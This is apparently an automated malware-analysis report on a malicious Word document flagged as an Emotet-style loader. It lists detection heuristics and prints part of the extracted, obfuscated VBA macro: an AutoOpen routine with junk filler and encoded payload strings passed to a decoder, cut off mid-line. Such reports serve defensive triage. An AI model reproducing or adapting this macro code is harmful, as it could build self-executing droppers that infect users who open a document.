MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and triggers a Shell() call, indicating an attempt to execute arbitrary code. This is characteristic of a downloader or droppper malware. The presence of the 'macros.bas' file further supports the macro-based execution.
Heuristics 7
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 134968 bytes |
SHA-256: 95ce1617fc49932d88629c028ed2256e19e1eaafd094d4b9e73ba3d6d36fdf8e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 44 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bKdacZSuG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case NcJPY
Case 49981
raidHZ = 88616
JmPzB = Tan(5 - CInt(LpldV) / fTvoTm + 525)
End Select
Application.Run zAOCC + "tqLdhwhG" + bUXlzz, dZEBpF + vQHChQNSfZSd + BmYmCw
Select Case XiuKU
Case 47848
OIXNwN = 71777
RzdViB = Tan(5 - CInt(qmdjGB) / cczFi + 6419)
End Select
End Sub
Attribute VB_Name = "dbfaHPQjosrIL"
Sub YIjRE(nHjnSp)
Select Case jvNqf
Case 65364
oYwvW = 73847
Kwkpzp = Tan(5 - CInt(DTTodZ) / WvrIS + 24549)
End Select
End Sub
Function vQHChQNSfZSd()
On Error Resume Next
Select Case PwAVf
Case 99590
Mrtjl = 44873
fvHwlz = Tan(5 - CInt(RRksCk) / vPUzpG + 36381)
End Select
XLYWwsuFdIh = WDjAwa("zBHWjHkAZQA1ADMAZQA0ADYAMgBjADQANwA4ADEAZgA0ADYANgA0AGYANQAzADMAMAA0AGYAOABkADQAMwAxAGMAB86", 7 + nzVjYk - nzVjYk, 82 + nzVjYk - nzVjYk)
Select Case Vulhm
Case 45507
UfVCVb = 34733
LwnKwj = Tan(5 - CInt(ccPNR) / YhvRiI + 50558)
End Select
Select Case jUhPh
Case 2497
UsHmc = 65073
EJNdsC = Tan(5 - CInt(FTQQD) / ZlZTJ + 90852)
End Select
pROLnPYbVa = WDjAwa("oMAYgA2ADQAOAAzADAAYgAzADMAYwBmADcAYwA0ADQAOAA5ADAANQA2ADMAMQBkADIAMgAzADkAZAA3ADEANQBiAGEAMABmAGUAZQA5ADYAZQBlADMAMABjAGUAMQBhAGUAMwA3ADcAMgAxADEANQBlADYAYgA1ADIAYwBmADYAMwA5ADkAZQA0AGYAYQAzAGYAMgA4A2V911f", 2 + NEMUk - NEMUk, 199 + NEMUk - NEMUk)
Select Case UlPzq
Case 99596
zRDqc = 47955
pBSom = Tan(5 - CInt(obBRz) / pzjTnd + 64749)
End Select
Select Case QFwGp
Case 23165
DOlHG = 85510
jnKra = Tan(5 - CInt(CBwld) / fSzWK + 59636)
End Select
SrECzC = WDjAwa("HRIAZABhADAAMgA2ADcAZgBjAGYANgBlADcAZAA2AGYAZgA0ADgAMwAyAGIAOQiCLA", 3 + PTuNm - PTuNm, 60 + PTuNm - PTuNm)
Select Case zTRkqX
Case 28403
UzDrG = 2944
waTKCS = Tan(5 - CInt(PGMcZ) / rDsbcd + 91084)
End Select
Select Case AOLFl
Case 51512
tUMiBM = 83508
MBzmdk = Tan(5 - CInt(NoYKF) / ziptf + 65790)
End Select
kzhZlhXmzz = WDjAwa("O9Hw3AGQAYQBkADAAYQA3ADUANABhAGIAZQA5ADIAYwAwADEAMgAyAGUAYQBmAGMANgA4ADQANwA2AGMAZAA2ADIAOQA3ADUL@Wj8", 5 + RCTUM - RCTUM, 92 + RCTUM - RCTUM)
Select Case RhDML
Case 11484
oazZf = 17739
vmqXI = Tan(5 - CInt(hAXhbV) / wmWlW + 58703)
End Select
Select Case RQTLiw
Case 8333
ztvLF = 22901
tacJmU = Tan(5 - CInt(LJifr) / fFBuo + 25720)
End Select
BRfaXfIwLV = WDjAwa("LK@aEAOQBhADgAMAAxADgAMwAxADMANQBmADMAMQBmAGEAYQA0ALW6w", 6 + Vfwlb - Vfwlb, 46 + Vfwlb - Vfwlb)
Select Case YsRFb
Case 83850
ONpwn = 23940
CHaRBT = Tan(5 - CInt(EKczH) / tsrAXr + 85583)
End Select
Select Case ucFRoz
Case 81119
hcmVM = 95779
iNcKQZ = Tan(5 - CInt(tsfFGV) / dXRWVL + 580)
End Select
KPkHYuSqQ = WDjAwa("%87lAGUAZQA2ADEAYQBhADAAOAA2AGIAYwBhAGIAZgBkAGQANwAyADYANABhAGMAOQA3ADgAYgAwADYAYwA4AGMAZgBhADEAMQAyADgAMAA4ADcAMABjADIAOQA5AGMAZgBhADcAYwA2ADcAZQBiADEANAA5ADgAZAA0AGIANwAzAGUAZgBkADkAYwA4ADIAOb23", 4 + BJXhu - BJXhu, 190 + BJXhu - BJXhu)
Select Case MZzUi
Case 88607
lXSti = 66620
UpaAFi = Tan(5 - CInt(mirVZ) / EVzrm + 56509)
End Select
Select Case dUqmSW
Case 35859
ZpiCG = 52423
aFMOtj = Tan(5 - CInt(qkfQw) / LkHsdP + 50681)
End Select
USrljoutEj = WDjAwa("9C6AzADMAMAAxADEAYwAwADAAMAA5AGMAZAA0ADEAYQAzADW618d", 4 + ADKvr - ADKvr, 44 + ADKvr - ADKvr)
Select Case sSiUSG
Case 62275
CUiVhk = 82099
qCMEiG = Tan(5 - CInt(Baito) / mYqAHi + 75313)
End Select
Select Case iwApNF
Case 53149
unTMK = 10266
TtptDU = Tan(5 - CInt(zUWCjM) / GWVDjn + 32732)
End Select
EIMcCUZJwN = WDjAwa("qzSpUA4AGUAOQAwAGQAYQA2ADEANQBlADkAMgA0AGQANwA0ADgAMAAyAGYAMwAxAGIAYQA4AGYANwBmADMANQBjAGUA88wC", 6 + ubdrri - ubdrri, 86 + ubdrri - ubdrri)
Select Case QUTPjL
Case 24726
wwIjz = 1484
BtaABj = Tan(5 - CInt(LWPno) / zIiRP + 43839)
End Select
Select Case MUTruz
Case 29007
kcuIYL = 58048
BimrFY = Tan(5 - CInt(CdMac) / JOtvo + 46103)
End Select
pwXAAMaYp = WDjAwa("8HpgA3ADEAMABiADkANwA3ADQAMAA3ADQAMQA3ADEANQA2ADqwAQC", 4 +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.